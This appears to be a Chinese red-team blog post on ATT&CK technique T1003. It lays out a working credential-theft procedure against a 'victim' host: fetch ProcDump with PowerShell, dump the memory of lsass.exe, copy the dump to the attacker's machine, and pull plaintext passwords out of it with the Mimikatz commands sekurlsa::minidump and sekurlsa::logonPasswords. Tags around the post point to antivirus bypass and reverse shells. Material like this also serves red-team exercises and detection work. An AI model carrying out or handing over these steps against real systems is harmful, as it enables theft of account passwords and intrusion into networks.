ATT&CK 

ATT&CK技术-T1003-Credential Dumping

Credential Dumping 凭证转储

Details

ProcDump and Mimikatz

  • 下载 ProcDump 工具到需要抓取密码的那台主机上:

可以使用 Powershell来下载,或者bitsadmin还有Certutil

powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip
  • 解压 Procdump.zip 在受害者机器上
  • 在受害者主机上转储lsass.exe的进程内存(使用克隆转储):
%ALLUSERSPROFILE%\procdump.exe -accepteula -ma lsass.exe lsass.dmp -r
  • lsass.dmp 文件下载到攻击者本地
  • 使用 Mimikatz (x64/mimikatz.exe) 以获取明文密码:
    • Run Mimikatz
    • 输入 sekurlsa::Minidump lsass.dmp
    • 输入 sekurlsa::logonPasswords

References

# Mimikatz  ProcDump  抓取密码  Credential Dumping  T1003 
[转载]DEVCORE 红队的进化,与下一步
使用Simple-Loader绕过杀软

评论

相关推荐

相关文章

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×

分类
杂记
权限维持
Bypass
ATT&CK
红蓝对抗
标签
2019
总结
记录SSH密码
权限维持
Linux
红队
T1003
Credential Dumping
抓取密码
Mimikatz
ProcDump
Simple-Loader
T1223
CHM
绕过windows defender
att&ck
MSbuild
远控上线
过360
反弹shell
PowerShell
BypassAV
PowerLine